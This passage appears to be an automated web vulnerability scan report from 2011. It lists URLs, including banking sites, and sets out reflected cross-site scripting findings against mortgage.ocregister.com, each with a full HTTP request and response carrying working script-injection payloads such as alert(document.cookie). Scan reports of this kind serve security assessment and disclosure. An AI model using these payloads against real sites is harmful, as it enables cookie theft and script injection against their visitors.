10.120. https://www.regions.com/personal_banking/morgan_keegan.rf

10.121. https://www.regions.com/personal_banking/open_account.rf

10.122. https://www.regions.com/personal_banking/platinum_visa_check.rf

10.123. https://www.regions.com/personal_banking/private_client.rf

10.124. https://www.regions.com/personal_banking/regionsnet.rf

10.125. https://www.regions.com/personal_banking/regionsnet_bill_pay.rf

10.126. https://www.regions.com/personal_banking/retirement_planning.rf

10.127. https://www.regions.com/personal_banking/savings_cds.rf

10.128. https://www.regions.com/personal_banking/trust_asset.rf

10.129. https://www.regions.com/small_business.rf

10.130. https://www.regions.com/system/gateway.rf

10.131. https://www.regions.com/templateOverview.aspx

10.132. https://www.regions.com/virtualMedia/img2297.gif

10.133. https://www.regions.com/virtualMedia/img2608.gif

10.134. https://www.regions.com/virtualMedia/img2853.jpg

10.135. https://www.regions.com/virtualMedia/img2859.gif

10.136. https://www.regions.com/virtualMedia/img2861.gif

10.137. https://www.regions.com/virtualMedia/img482.jpg

10.138. https://www.suntrust.com/imageserver/plumtree/common/private/js/jsincluder/LATEST/PTIncluder.js

10.139. https://www.supermedia.com/spportal/spportalFlow.do

10.140. https://www.us.hsbc.com/1/2/3/hsbcpremier/contact-us-form

10.141. https://www.us.hsbc.com/1/2/3/personal/online-services/personal-internet-banking/log-on

10.142. https://www.wachovia.com/

10.143. https://www.wellsfargo.com/

10.144. https://www.wellsfargo.com/about/

10.145. https://www.wellsfargo.com/jump/wachovia/EFS/WAC1

10.146. https://www.wellsfargo.com/jump/wachovia/insurance/identity

10.147. https://www.wellsfargo.com/jump/wachovia/mortgage/firsttimebuyer

10.148. https://www.wellsfargo.com/locator/atm/search

10.149. https://www.wellsfargo.com/mortgage/

10.150. https://www.wellsfargo.com/mortgage/apply/

10.151. https://www.wellsfargo.com/mortgage/buy/

10.152. https://www.wellsfargo.com/mortgage/locations/

10.153. https://www.wellsfargo.com/mortgage/rates/

10.154. https://www.wellsfargo.com/mortgage/refinance/

10.155. https://www.wellsfargo.com/tas

10.156. https://www.wellsfargo.com/wachovia

10.157. https://www.wellsfargo.com/wachovia/autoloans/index

10.158. https://www.wellsfargo.com/wachovia/insurance

10.159. https://www.wellsfargo.com/wachovia/mortgage/index

10.160. https://www.wellsfargo.com/wachovia/wealthmanagement/index

10.161. https://www.zionsbank.com/ichecking_landing.jsp

10.162. https://www134.americanexpress.com/consumertravel/travel.do

10.163. https://www152.americanexpress.com/premium/credit-card-travel-insurance/home.do

10.164. https://www209.americanexpress.com/merchant/mainpagedom/authreg_showMainpage.do

10.165. https://www217.americanexpress.com/cards/home.do

10.166. https://www217.americanexpress.com/cards/shopping/index.jsp

11. Session token in URL

11.1. http://bh.contextweb.com/bh/set.aspx

11.2. http://c.chango.com/collector/am/pixel

11.3. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania

11.4. http://dev.virtualearth.net/services/v1/ImageryMetadataService/ImageryMetadataService.asmx/GetBirdsEyeSceneByLocation

11.5. http://dev.virtualearth.net/services/v1/geocodeservice/geocodeservice.asmx/Geocode

11.6. http://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log

11.7. http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434/

11.8. http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/

11.9. http://fls.doubleclick.net/activityi

11.10. http://huntingtonhomes.ocregister.com/2011/02/02/trashed-h-b-house-on-good-morning-america/127042/

11.11. http://huntingtonhomes.ocregister.com/2011/02/03/repod-green-home-is-back-on-the-market/127100/

11.12. http://inyourface.ocregister.com/2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/

11.13. http://l.sharethis.com/pview

11.14. http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/14224/

11.15. http://lagunahomes.ocregister.com/2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/

11.16. http://lansner.ocregister.com/2011/02/02/a-new-home-for-kobe-bryant/97596/

11.17. http://lansner.ocregister.com/2011/02/02/homebuilding-slump-now-3-years-old/98070/

11.18. http://lansner.ocregister.com/2011/02/03/orange-county-property/98182/

11.19. http://lansner.ocregister.com/category/outlooks/eyeball-11/

11.20. http://mortgage.ocregister.com/

11.21. http://mortgage.ocregister.com/2007/02/

11.22. http://mortgage.ocregister.com/2007/03/

11.23. http://mortgage.ocregister.com/2007/04/

11.24. http://mortgage.ocregister.com/2007/05/

11.25. http://mortgage.ocregister.com/2007/06/

11.26. http://mortgage.ocregister.com/2007/07/

11.27. http://mortgage.ocregister.com/2007/08/

11.28. http://mortgage.ocregister.com/2007/09/

11.29. http://mortgage.ocregister.com/2007/10/

11.30. http://mortgage.ocregister.com/2007/11/

11.31. http://mortgage.ocregister.com/2007/12/

11.32. http://mortgage.ocregister.com/2008/01/

11.33. http://mortgage.ocregister.com/2008/02/

11.34. http://mortgage.ocregister.com/2008/03/

11.35. http://mortgage.ocregister.com/2008/04/

11.36. http://mortgage.ocregister.com/2008/05/

11.37. http://mortgage.ocregister.com/2008/06/

11.38. http://mortgage.ocregister.com/2008/07/

11.39. http://mortgage.ocregister.com/2008/08/

11.40. http://mortgage.ocregister.com/2008/09/

11.41. http://mortgage.ocregister.com/2008/10/

11.42. http://mortgage.ocregister.com/2008/11/

11.43. http://mortgage.ocregister.com/2008/12/

11.44. http://mortgage.ocregister.com/2009/01/

11.45. http://mortgage.ocregister.com/2009/02/

11.46. http://mortgage.ocregister.com/2009/03/

11.47. http://mortgage.ocregister.com/2009/04/

11.48. http://mortgage.ocregister.com/2009/05/

11.49. http://mortgage.ocregister.com/2009/06/

11.50. http://mortgage.ocregister.com/2009/07/

11.51. http://mortgage.ocregister.com/2009/08/

11.52. http://mortgage.ocregister.com/2009/09/

11.53. http://mortgage.ocregister.com/2009/10/

11.54. http://mortgage.ocregister.com/2009/11/

11.55. http://mortgage.ocregister.com/2009/12/

11.56. http://mortgage.ocregister.com/2010/01/

11.57. http://mortgage.ocregister.com/2010/02/

11.58. http://mortgage.ocregister.com/2010/03/

11.59. http://mortgage.ocregister.com/2010/04/

11.60. http://mortgage.ocregister.com/2010/05/

11.61. http://mortgage.ocregister.com/2010/06/

11.62. http://mortgage.ocregister.com/2010/07/

11.63. http://mortgage.ocregister.com/2010/08/

11.64. http://mortgage.ocregister.com/2010/09/

11.65. http://mortgage.ocregister.com/2010/10/

11.66. http://mortgage.ocregister.com/2010/11/

11.67. http://mortgage.ocregister.com/2010/12/

11.68. http://mortgage.ocregister.com/2011/01/

11.69. http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162/

11.70. http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/41334/

11.71. http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/

11.72. http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/

11.73. http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/

11.74. http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/

11.75. http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/

11.76. http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/

11.77. http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/

11.78. http://mortgage.ocregister.com/2011/02/

11.79. http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/

11.80. http://mortgage.ocregister.com/feeda71cd">1f35e8c0ea2/feed/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd"><script>alert(document.cookie)</script>1f35e8c0ea2/feed/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b243<script>alert(1)</script>b89f925ed73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd"><script>alert(document.cookie)</script>1f35e8c0ea2/feed5b243<script>alert(1)</script>b89f925ed73/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</script>1f35e8c0ea2/feed5b243<script>alert(1)</script>b89f925ed73/feed/" />
...[SNIP]...

4.388. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd%2522%253E%253Cscript%253Ealert(1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a614"><script>alert(1)</script>e492f5d219d was submitted in the REST URL parameter 1. This input was echoed as 4a614\"><script>alert(1)</script>e492f5d219d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(14a614"><script>alert(1)</script>e492f5d219d HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:18 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(14a614\"><script>alert(1)</script>e492f5d219dfeed/" />
...[SNIP]...

4.389. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd%2522%253E%253Cscript%253Ealert(1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee1f2"><script>alert(1)</script>14894bf18ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee1f2\"><script>alert(1)</script>14894bf18ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(1?ee1f2"><script>alert(1)</script>14894bf18ef=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1?ee1f2\"><script>alert(1)</script>14894bf18ef=1feed/" />
...[SNIP]...

4.390. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2efa0"><script>alert(1)</script>c5d2576f89d was submitted in the REST URL parameter 1. This input was echoed as 2efa0\"><script>alert(1)</script>c5d2576f89d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie2efa0"><script>alert(1)</script>c5d2576f89d HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie2efa0\"><script>alert(1)</script>c5d2576f89dfeed/" />
...[SNIP]...

4.391. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19724"><script>alert(1)</script>5a15440a445 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19724\"><script>alert(1)</script>5a15440a445 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie?19724"><script>alert(1)</script>5a15440a445=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
el="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie?19724\"><script>alert(1)</script>5a15440a445=1feed/" />
...[SNIP]...

4.392. http://mortgage.ocregister.com/files [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /files

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7804f"><script>alert(1)</script>b31526e044f was submitted in the REST URL parameter 1. This input was echoed as 7804f\"><script>alert(1)</script>b31526e044f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /files7804f"><script>alert(1)</script>b31526e044f HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/files7804f\"><script>alert(1)</script>b31526e044ffeed/" />
...[SNIP]...

4.393. http://mortgage.ocregister.com/files [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /files

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bcea"><script>alert(1)</script>d63783f7e5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bcea\"><script>alert(1)</script>d63783f7e5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /files?3bcea"><script>alert(1)</script>d63783f7e5a=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/files?3bcea\"><script>alert(1)</script>d63783f7e5a=1feed/" />
...[SNIP]...

4.394. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /ver1.0/Content/dmhotlinks.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12f7c"><script>alert(1)</script>5e4882fdc7d was submitted in the REST URL parameter 1. This input was echoed as 12f7c\"><script>alert(1)</script>5e4882fdc7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.012f7c"><script>alert(1)</script>5e4882fdc7d/Content/dmhotlinks.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 44146092a8373b49c062f68d9825aa14=1; s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; AxData=; Axxd=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:03:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:03:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ver1.012f7c\"><script>alert(1)</script>5e4882fdc7d/Content/dmhotlinks.cssfeed/" />
...[SNIP]...

4.395. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /ver1.0/Content/dmhotlinks.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17b7a"><script>alert(1)</script>df3c8a873d1 was submitted in the REST URL parameter 2. This input was echoed as 17b7a\"><script>alert(1)</script>df3c8a873d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Content17b7a"><script>alert(1)</script>df3c8a873d1/dmhotlinks.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 44146092a8373b49c062f68d9825aa14=1; s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; AxData=; Axxd=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:03:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:03:05 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ver1.0/Content17b7a\"><script>alert(1)</script>df3c8a873d1/dmhotlinks.cssfeed/" />
...[SNIP]...

4.396. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /ver1.0/Content/dmhotlinks.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92232"><script>alert(1)</script>8606eb47764 was submitted in the REST URL parameter 3. This input was echoed as 92232\"><script>alert(1)</script>8606eb47764 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Content/dmhotlinks.css92232"><script>alert(1)</script>8606eb47764 HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
